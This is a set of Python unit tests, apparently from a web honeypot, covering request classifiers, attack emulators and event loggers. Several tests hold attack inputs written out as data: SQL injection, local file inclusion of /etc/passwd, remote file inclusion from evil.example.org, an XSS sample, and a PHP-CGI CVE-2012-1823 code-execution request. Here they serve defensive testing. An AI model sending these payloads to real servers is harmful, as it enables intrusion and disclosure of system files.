def test_parse_version(self):
""" Test if the http handler is able to customize the server version string. """
get_request = """GET /test HTTP/1.0\r\nUser-Agent: test\r\n\r\n"""
http_handler = HTTPHandler(get_request,
None,
server_version="LEET_Server/0.1",
sys_version="LEET_OS/1.0")
self.assertEqual("LEET_Server/0.1 LEET_OS/1.0",
http_handler.version_string())
def test_hpfeeds_event_with_file(self):
"""Objective: Testing if a event containing a file can be transmitted using hpfriends."""
config_file = tempfile.mkstemp()[1]
with open(config_file, 'w') as f:
f.writelines(helpers.gen_config(''))
#create dummy file
file_name = 'dummy_file'
with open(os.path.join(self.files_dir, file_name), 'w') as f:
f.write('test_test_test_test_test')
logger = HPFeedsLogger(self.tmpdir,
config=config_file,
reconnect=False)
event = attack.AttackEvent()
event.http_request = HTTPHandler('', None)
event.raw_request = "GET /honeypot_test HTTP/1.1\r\nHost: honeypot\r\n\r\n"
event.file_name = file_name
logger.insert(event)
gevent.sleep(2)
# if None we did not connect
self.assertIsNotNone(logger.hpc.wait)
error_message = logger.hpc.wait(2)
self.assertIsNone(error_message)
def test_stix_transform_event_with_rfidata(self):
"""
Objective: Test if the expected XML is generated from a "unknown" attack event.
"""
rfi_data = """<?php echo "<script>alert("test");</script>";?>"""
rfi_md5 = hashlib.md5(rfi_data).hexdigest()
with open(os.path.join(self.files_dir, rfi_md5), 'w') as rfi_file:
rfi_file.writelines(rfi_data)
test_event = AttackEvent()
test_event.source_addr = ('1.2.3.4', 43811)
test_event.matched_pattern = 'rfi'
test_event.file_name = rfi_md5
http_request_content = """GET /test HTTP/1.0\r\nUser-Agent: test\r\n\r\n"""
test_event.http_request = HTTPHandler(http_request_content,
None,
server_version="",
sys_version="")
stix_package_xml = self.stix_transformer.transform(test_event)
(isvalid, validation_error,
best_practice_warnings) = self.xml_validator.validate(
StringIO(stix_package_xml.encode('utf-8')))
self.assertTrue(
isvalid,
'Error while parsing STIX xml: {0}'.format(validation_error))
self.assertTrue(
'<cyboxCommon:Simple_Hash_Value>0e209064ee6949f6e57b3d77d5b1f92c</cyboxCommon:Simple_Hash_Value>'
in stix_package_xml)
self.assertTrue(
'<cyboxCommon:Simple_Hash_Value>11a2a92d391f10821dbb90f1f7e6ae0f2374231e0ccd611665c95d6d7a3bb43c</cyboxCommon:Simple_Hash_Value>'
in stix_package_xml)
self.assertTrue(
'<ArtifactObj:Raw_Artifact datatype="string"><![CDATA[PD9waHAgZWNobyAiPHNjcmlwdD5hbGVydCgidGVzdCIpOzwvc2NyaXB0PiI7Pz4=]]></ArtifactObj:Raw_Artifact>'
in stix_package_xml)
def test_stix_transform(self):
"""
Objective: Test if the expected XML is generated from a "unknown" attack event.
"""
test_event = AttackEvent()
test_event.source_addr = ('1.2.3.4', 43811)
http_request_content = """GET /test HTTP/1.0\r\nUser-Agent: test\r\n\r\n"""
test_event.http_request = HTTPHandler(http_request_content,
None,
server_version="",
sys_version="")
stix_package_xml = self.stix_transformer.transform(test_event)
(isvalid, validation_error,
best_practice_warnings) = self.xml_validator.validate(
StringIO(stix_package_xml.encode('utf-8')))
self.assertTrue(
isvalid,
'Error while parsing STIX xml: {0}'.format(validation_error))
self.assertTrue(
'<HTTPSessionObj:User_Agent>test</HTTPSessionObj:User_Agent>' in
stix_package_xml)
self.assertTrue(
'<HTTPSessionObj:HTTP_Method datatype="string">GET</HTTPSessionObj:HTTP_Method>'
in stix_package_xml)
self.assertTrue('<HTTPSessionObj:Value>/test</HTTPSessionObj:Value>' in
stix_package_xml)
self.assertTrue(
'<HTTPSessionObj:Version>HTTP/1.0</HTTPSessionObj:Version>' in
stix_package_xml)
def test_unknown_emulator(self):
"""Objective: Emulator testing for non-malicious requests.
Input: http://localhost:8080/
Expected Result: One of the generated attack surfaces.
Notes:"""
tmp_file = os.path.join(self.data_dir, 'dork_pages',
format(str(uuid.uuid4())))
with open(tmp_file, 'w+') as f:
f.write("tmpfile")
print "Starting 'unknown' request emulation module"
event = attack.AttackEvent()
event.http_request = HTTPHandler('', None)
event.matched_pattern = "unknown"
event.http_request.path = "/"
event.source_addr = ("127.0.0.1", "8080")
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
print "Sending request:", "http://localhost:8080/"
emulator.handle(event)
remote_hash = hashlib.md5(
event.http_request.get_response_body()).hexdigest()
local_hash = hashlib.md5(emulator.template).hexdigest()
print "Hash of the local 'response' file:", local_hash
self.assertEqual(remote_hash, local_hash)
print "Return value:", remote_hash
print "matched a generated attack surface item."
def test_robots_classifier(self):
"""Objective: Test classifier for robots.txt requests
Input: HTTPRequest with an robots.txt GET request
Expected Response: matched pattern to robots
Note: """
httphandler = HTTPHandler('GET /robots.txt HTTP/1.0', None)
matched_pattern = self.requestClassifier.classify_request(httphandler)
self.assertTrue(matched_pattern == 'robots', '{0} did not match expected pattern'.format(matched_pattern))
def test_sqli_classifier(self):
"""Objective: Test classifier for SQL Injection requests
Input: HTTPRequest with a generic sql injection attempt
Expected Response: matched pattern to sqli
Note: """
intput_paths = ('/index.php?id=anything"%20OR%20"x"="x";',)
for path in intput_paths:
request = 'GET {0} HTTP/1.0'.format(path)
http_handler = HTTPHandler(request, None)
matched_pattern = self.requestClassifier.classify_request(http_handler)
self.assertTrue(matched_pattern == 'sqli', '{0} did not match expected pattern'.format(matched_pattern))
def test_login_classifier(self):
"""Objective: Test classifier for login requests
Input: HTTPRequest with a generic authentication login attempt
Expected Response: matched pattern to login
Note: """
intput_paths = ('/login',)
for path in intput_paths:
request = 'GET {0} HTTP/1.0'.format(path)
http_handler = HTTPHandler(request, None)
matched_pattern = self.requestClassifier.classify_request(http_handler)
self.assertTrue(matched_pattern == 'login', '{0} did not match expected pattern'.format(matched_pattern))
def test_phpcgi_source_code_disclosure_emulator(self):
"""Objective: Emulator testing for PHP CGI source code disclosure CVE-2012-1823
Input: http://localhost:8080/index.php?-s
Expected Result: Source code disclosure
Notes:"""
event = attack.AttackEvent()
event.http_request = HTTPHandler('GET /index.php?-s HTTP/1.0', None)
event.matched_pattern = "php_cgi_rce"
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
emulator.handle(event)
self.assertEquals(event.http_request.get_response(), """<code><span style="color: #000000">
<span style="color: #0000BB"><?php<br />page </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'page'</span><span style="color: #007700">];<br />include(</span><span style="color: #0000BB">page</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">?><br /></span>
</span>""")
def test_lfi_classifier(self):
"""Objective: Test classifier for LFI requests
Input: HTTPRequest with different kind of local file includes attempts
Expected Response: matched pattern to rfi
Note: """
intput_paths = ('/index.php?file=../../../../../../etc/passwd',
'/index.php?file=../../../../../../etc/passwd%00')
for path in intput_paths:
request = 'GET {0} HTTP/1.0'.format(path)
http_handler = HTTPHandler(request, None)
matched_pattern = self.requestClassifier.classify_request(http_handler)
self.assertTrue(matched_pattern == 'lfi', '{0} did not match expected pattern'.format(matched_pattern))
def test_phpinfo_emulator(self):
"""Objective: Emulator testing for phpinfo.php requests
Input: http://localhost/phpinfo.php
Expected Result: Result of the phpinfo() function
Notes:"""
event = attack.AttackEvent()
event.http_request = HTTPHandler('GET /info.php?param1 HTTP/1.0', None)
event.matched_pattern = "phpinfo"
#self.event.http_request.method = 'GET'
#self.event.http_request.url = "/info.php?param1"
event.matched_pattern = "phpinfo"
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
emulator.handle(event)
self.assertTrue("PHP Version " in event.http_request.get_response())
self.assertTrue("Zend Extension" in event.http_request.get_response())
def test_dummy_emulator(self):
"""Objective: Tests the dummy emulator added to prove extensibility.
Input: http://localhost:8080/
Expected Results: Returns a short message for verification.
Notes: The dummy emulator fulfills minimal emulator requirements."""
print "Starting Dummy emulator module test"
event = attack.AttackEvent()
event.http_request = HTTPHandler('', None)
event.matched_pattern = "dummy"
print "Loading module"
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
print "Trying to handle an event with the dummy module"
emulator.handle(event)
self.assertEqual(event.http_request.get_response_body(), "dummy response")
print "Return value: '" + event.http_request.get_response_body() + "'",
print "equates our expectation."
def test_phpmyadmin_classifier(self):
"""Objective: Test classifier for phpmyadmin requests
Input: HTTPRequest with a generic reference to phpmyadmin paths
Expected Response: matched pattern to phpmyadmin
Note: """
intput_paths = ('/phpmyadmin/', '/phpMyadmin/', '/pma/', '/PMA',
'/phpMyAdmin-2.8.2/')
for path in intput_paths:
request = 'GET {0} HTTP/1.0'.format(path)
http_handler = HTTPHandler(request, None)
matched_pattern = self.requestClassifier.classify_request(
http_handler)
self.assertTrue(
matched_pattern == 'phpmyadmin',
'{0} did not match expected pattern'.format(matched_pattern))
def test_phpinfo_classifier(self):
"""Objective: Test classifier for phpinfo debug/test requests
Input: HTTPRequest with an attempt to discover a generic phpinfo test page
Expected Response: matched pattern to phpinfo
Note: """
intput_paths = ('/phpinfo.php?ss', '/phpinfo.php', '/info.php',
'/info.php?page', '/phpinfo.html')
for path in intput_paths:
request = 'GET {0} HTTP/1.0'.format(path)
http_handler = HTTPHandler(request, None)
matched_pattern = self.requestClassifier.classify_request(
http_handler)
self.assertTrue(
matched_pattern == 'phpinfo',
'{0} did not match expected pattern'.format(matched_pattern))
def test_phpcgi_rce_emulator(self):
"""Objective: Emulator testing for PHP CGI remote code execution CVE-2012-1823
Input: http://localhost/-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input POST: <?php echo("rce attempt"); ?>
Expected Result: Remote command execution of a echo command
Notes:"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
os.mkdir(os.path.join(self.data_dir, 'files/'))
request = "POST /index.php?-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input HTTP/1.0\r\n\r\n" \
'<?php echo "testing"; ?>'
event = attack.AttackEvent()
event.http_request = HTTPHandler(request, None)
event.matched_pattern = "php_cgi_rce"
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
emulator.handle(event)
print "Return value:", event.http_request.get_response()
self.assertTrue("""testing""" == event.http_request.get_response())
def test_put_method(self):
"""Objective: Test handling of a PUT requests
Input: curl -XPUT http://localhost/
Expected Result: request verb is PUT, matcher pattern is put
Notes:"""
event = attack.AttackEvent()
event.http_request = HTTPHandler('PUT / HTTP/1.0', None)
self.assertTrue(event.http_request.request_verb == "PUT")
method_handlers = method_handler.HTTPMethods(self.data_dir)
event.matched_pattern = getattr(
method_handlers, event.http_request.command,
method_handlers.GET)(event.http_request)
self.assertTrue(event.matched_pattern == 'put')
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
emulator.handle(event)
self.assertTrue('Created' in event.http_request.get_response())
def test_hpfeeds_event(self):
"""Objective: Testing if a basic event can be transmitted using hpfriends."""
config_file = tempfile.mkstemp()[1]
with open(config_file, 'w') as f:
f.writelines(helpers.gen_config(''))
logger = HPFeedsLogger(self.tmpdir, os.getcwd(), config=config_file, reconnect=False)
event = attack.AttackEvent()
event.http_request = HTTPHandler('', None)
event.raw_request = "GET /honeypot_test HTTP/1.1\r\nHost: honeypot\r\n\r\n"
logger.insert(event)
gevent.sleep(2)
# if None we did not connect
self.assertIsNotNone(logger.hpc.wait)
error_message = logger.hpc.wait(2)
self.assertIsNone(error_message)
def test_taxii_connectivity_https(self):
"""
Objective: Test if we can send a message to mitre's test TAXII server using https.
"""
self.config.set('taxii', 'use_https', 'True')
test_event = AttackEvent()
test_event.source_addr = ('1.2.3.4', 43811)
http_request_content = """GET /test HTTP/1.0\r\nUser-Agent: test\r\n\r\n"""
test_event.http_request = HTTPHandler(http_request_content,
None,
server_version="",
sys_version="")
taxiiLogger = TaxiiLogger(self.tmpdir, self.config)
taxii_result = taxiiLogger.insert(test_event)
# TaxiiLogger returns false if the message could not be delivered
self.assertTrue(taxii_result)
def test_rfi_classifier(self):
"""Objective: Test classifier for RFI requests
Input: HTTPRequest with different kind of remote file includes attempts
Expected Response: matched pattern to rfi
Note: """
intput_paths = ('/index.php?file=http://evil.example.org/t.txt?',
'/index.php?file=%20http://evil.example.org/t.txt?',
'/index.php?file=https://evil.example.org/t.txt?',
'/index.php?file=ftp://evil.example.org/t.txt?,'
'/index.php?file=ftps://evil.example.org/t.txt?',
're/test.jsp?r=%22http://www.gogole.it/')
for path in intput_paths:
request = 'GET {0} HTTP/1.0'.format(path)
http_handler = HTTPHandler(request, None)
matched_pattern = self.requestClassifier.classify_request(http_handler)
self.assertTrue(matched_pattern == 'rfi', '{0} did not match expected pattern'.format(matched_pattern))
def test_rfi_emulator_with_malformed_uri(self):
# TODO: Handle return value from sandbox
"""Objective: Remote File Injection test with malformed uri
Input: http://localhost:8080/test.php?p="http://google.com/index.html
Expected Result: The return value from the PHP sandbox.
Notes: Injected file contains <?php echo("test successful"); ?>"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
print "Starting remote file inclusion test"
event = attack.AttackEvent()
event.http_request = HTTPHandler('GET /test.php?p=http://1durch0.de/test_file.txt HTTP/1.0', None)
event.matched_pattern = "rfi"
helpers.create_sandbox(self.data_dir)
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
print "Sending request:", "http://localhost:8080" + event.http_request.path
emulator.handle(event)
self.assertEqual(event.http_request.get_response(), "test successful")
print "Return value 'test successful', matching our expectation."
def test_lfi_emulator(self):
"""Objective: Local File Inclusion module testing.
Input: http://localhost:8080/test.php?p=../../../../../etc/passwd
Expected Result: The passwd file from the virtual file system.
Notes:"""
print "Starting local file inclusion test"
event = attack.AttackEvent()
event.matched_pattern = "lfi"
event.http_request = HTTPHandler('', None)
event.http_request.request_path = "/test.php?p=../../../../../etc/passwd"
print "Sending request:", "http://localhost:8080" + event.http_request.path
print "Loading the emulator and handling the request."
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
emulator.handle(event)
#TODO: Check it contains user names...
response = event.http_request.get_response()
self.assertIn('root:x:0:0:root:/root:/bin/bash', response)
self.assertIn('daemon:x:1:1:daemon:/usr/sbin:/bin/sh', response)
def test_stix_transform_invalid_header(self):
"""
Objective: Test if we can generate valid XML from a HTTP request with a invalid header item.
"""
test_event = AttackEvent()
test_event.source_addr = ('1.2.3.4', 43811)
http_request_content = """GET /test HTTP/1.0\r\nXUser-XAgent: test\r\n\r\n"""
test_event.http_request = HTTPHandler(http_request_content,
None,
server_version="",
sys_version="")
stix_package_xml = self.stix_transformer.transform(test_event)
(isvalid, validation_error,
best_practice_warnings) = self.xml_validator.validate(
StringIO(stix_package_xml.encode('utf-8')))
self.assertTrue(
isvalid,
'Error while parsing STIX xml: {0}'.format(validation_error))
def test_rfi_emulator_with_malformed_uri(self):
# TODO: Handle return value from sandbox
"""Objective: Remote File Injection test with malformed uri
Input: http://localhost:8080/test.php?p="http://google.com/index.html
Expected Result: The return value from the PHP sandbox.
Notes: Injected file contains <?php echo("test successful"); ?>"""
GlastopfHoneypot.prepare_sandbox(self.work_dir)
print "Starting remote file inclusion test"
event = attack.AttackEvent()
url = "https://gist.githubusercontent.com/glaslos/02c4c4be39fb03b3bbee5c862cd304c6/raw/adf146469e8eeee4498874164ecd80c70ffb4e7a/test_file.txt"
event.http_request = HTTPHandler(
'GET /test.php?p={} HTTP/1.0'.format(url), None)
event.matched_pattern = "rfi"
helpers.create_sandbox(self.data_dir)
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
print "Sending request:", "http://localhost:8080" + event.http_request.path
emulator.handle(event)
self.assertEqual(event.http_request.get_response(), "test successful")
print "Return value 'test successful', matching our expectation."
def test_pma_emulator(self):
"""Objective: Testing an emulator for PHPMyAdmin specific attacks.
Input: http://localhost:8080/phpmyadmin
Expected Result: The PHPMyAdmin set-up page.
Notes: This module is for a specific attack against PHPMyAdmin"""
with open(os.path.join(self.data_dir, 'phpmyadmin/script_setup.php'), 'r') as setup_php:
page = setup_php.read()
local_hash = hashlib.md5(page).hexdigest()
print "Hash of the local 'script' file:", local_hash
event = attack.AttackEvent()
event.matched_pattern = "phpmyadmin"
event.http_request = HTTPHandler('', None)
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
print "Sending request:", "http://localhost:8080/phpmyadmin/setup.php"
emulator.handle(event)
remote_hash = hashlib.md5(emulator.page).hexdigest()
self.assertEqual(remote_hash, local_hash)
print "Return value:", remote_hash
print "matched the hash of the local file."
def test_robots_emulator(self):
"""Objective: Test the robots.txt emulator.
Input: http://localhost:8080/robots.txt
Expected Response: The robots.txt page.
Notes: The robots.txt is provided by the honeypot"""
print "Starting robot.txt request handling module"
with open(os.path.join(self.data_dir, 'robots/robots.txt'), 'r') as robots_file:
robots = robots_file.read()
local_hash = hashlib.md5(robots).hexdigest()
print "Hash of the local 'robots' file:", local_hash
event = attack.AttackEvent()
event.http_request = HTTPHandler('GET /robots.txt HTTP/1.0', None)
event.matched_pattern = "robots"
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
print "Sending request:", "http://localhost:8080/robots.txt"
emulator.handle(event)
remote_hash = hashlib.md5(event.http_request.get_response()).hexdigest()
self.assertEqual(remote_hash, local_hash)
print "Return value:", remote_hash
print "matched content of robots.txt."
def test_taxii_connectivity_https(self):
"""
Objective: Test if we can send a message to mitre's test TAXII server using https.
"""
self.config.set('taxii', 'use_https', 'True')
config_file = tempfile.mkstemp()[1]
with open(config_file, 'w') as f:
self.config.write(f)
test_event = AttackEvent()
test_event.source_addr = ('1.2.3.4', 43811)
http_request_content = """GET /test HTTP/1.0\r\nUser-Agent: test\r\n\r\n"""
test_event.http_request = HTTPHandler(http_request_content,
None,
server_version="",
sys_version="")
taxiiLogger = TaxiiLogger(self.tmpdir, os.getcwd(), config_file)
taxii_result = taxiiLogger.insert(test_event)
# TaxiiLogger returns false if the message could not be delivered
self.assertTrue(taxii_result)
f.close() #clean the tempfile
def test_style_css_emulator(self):
"""Objective: Test the style.css emulator.
Input: http://localhost:8080/styles.css
Expected Result: The styles.css file.
Notes: Definitions used for the attacks surface style parameters."""
print "Starting style.css emulator test"
with open(os.path.join(self.data_dir, 'style/style.css'), 'r') as style_file:
style = style_file.read()
local_hash = hashlib.md5(style).hexdigest()
print "Hash of the local 'style' file:", local_hash
event = attack.AttackEvent()
event.http_request = HTTPHandler('', None)
event.matched_pattern = "style_css"
request_handler = RequestHandler(self.data_dir)
emulator = request_handler.get_handler(event.matched_pattern)
print "Sending request:", "http://localhost:8080/style.css"
emulator.handle(event)
remote_hash = hashlib.md5(event.http_request.get_response_body()).hexdigest()
self.assertEqual(remote_hash, local_hash)
print "Return value:", remote_hash
print "matched content of style.css."
def test_mongodb_insert(self):
conn_string = helpers.create_mongo_database(fill=False)
db_name = uri_parser.parse_uri(conn_string)["database"]
try:
maindb = log_mongodb.Database(conn_string)
attack_event = attack.AttackEvent()
attack_event.event_time = self.event_time = datetime.now(
).strftime("%Y-%m-%d %H:%M:%S")
attack_event.matched_pattern = "test_test"
attack_event.source_addr = ("192.168.1.201", 12345)
request = ("GET /breadandbytter.php?a=b HTTP/1.0\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
"ISO-8859-1,utf-8;q=0.7,*;q=0.3r\n"
"Connection: keep-alive\r\n\r\n"
"some stuff")
attack_event.http_request = HTTPHandler(request, None)
maindb.insert(attack_event)
with warnings.catch_warnings(record=True):
collection = MongoClient(conn_string)[db_name]["events"]
results = list(collection.find())
#Check if database returned the correct amount
self.assertEqual(len(list(results)), 1)
entry = results[0]
self.assertEqual(entry["source"][0], "192.168.1.201")
self.assertEqual(entry["source"][1], 12345)
self.assertEqual(entry["pattern"], "test_test")
self.assertEqual(entry["request_raw"], request)
self.assertEqual(entry["request_url"], "/breadandbytter.php?a=b")
finally:
helpers.delete_mongo_testdata(conn_string)
def test_automated_extension(self):
"""Objective: Test if the dork database extends on new requests to the honeypot.
Input: A test request with URL: http://localhost:8080/test.php?c=test
Expected Results: An entry in the 'inurl' db table containing '/test.php'.
Notes: The test adds the '/test.php' entry to the database."""
attack_event = attack.AttackEvent()
attack_event.matched_pattern = "internal_test"
attack_event.http_request = HTTPHandler(
'GET /thiswillNeVeRHaPPend.php?c=test', None)
print "Attack event prepared."
(db, engine, dork_generator) = self.dork_generator_chain('sql')
dork_generator.regular_generate_dork(0)
dork_generator.collect_dork(attack_event)
print "Done collecting the path from the event and writing to the database."
sql = "SELECT * FROM inurl WHERE content = :x"
result = engine.connect().execute(
sql, x='/thiswillNeVeRHaPPend.php').fetchall()
print "Done fetching the entries matching the request URL"
self.assertTrue(len(result) > 0)
print "Number of entries in the database matching our URL:",
print len(result),
print "which equates our expectation."
def test_sqla_insert(self):
#in-memory sqlite database
sqla_engine = create_engine("sqlite:///")
maindb = log_sql.Database(sqla_engine)
#prepare attack event
attack_event = attack.AttackEvent()
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
attack_event.event_time = timestamp
attack_event.matched_pattern = "test_test"
attack_event.source_addr = ("192.168.1.201", 12345)
request = ('GET /breadandbytter.php?a=b HTTP/1.0\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'ISO-8859-1,utf-8;q=0.7,*;q=0.3r\n'
'Connection: keep-alive\r\n\r\n'
'some stuff')
attack_event.http_request = HTTPHandler(request, None)
#insert attack event
maindb.insert(attack_event)
#try to extract event from the database
sql = "SELECT * FROM events"
results = sqla_engine.connect().execute(sql).fetchall()
#Check if database returned the correct amount
self.assertEqual(len(list(results)), 1)
print results[0]
entry = results[0]
#check basic attributes
#time
self.assertEqual(entry[1], timestamp)
#source
self.assertEqual(entry[2], "192.168.1.201:12345")
#request_url
self.assertEqual(entry[3], "/breadandbytter.php?a=b")
#request_body
self.assertEqual(entry[4], request)
#pattern
self.assertEqual(entry[5], "test_test")
def test_parse_version(self):
""" Test if the http handler is able to customize the server version string. """
get_request = """GET /test HTTP/1.0\r\nUser-Agent: test\r\n\r\n"""
http_handler = HTTPHandler(get_request, None, server_version="LEET_Server/0.1", sys_version="LEET_OS/1.0")
self.assertEqual("LEET_Server/0.1 LEET_OS/1.0", http_handler.version_string())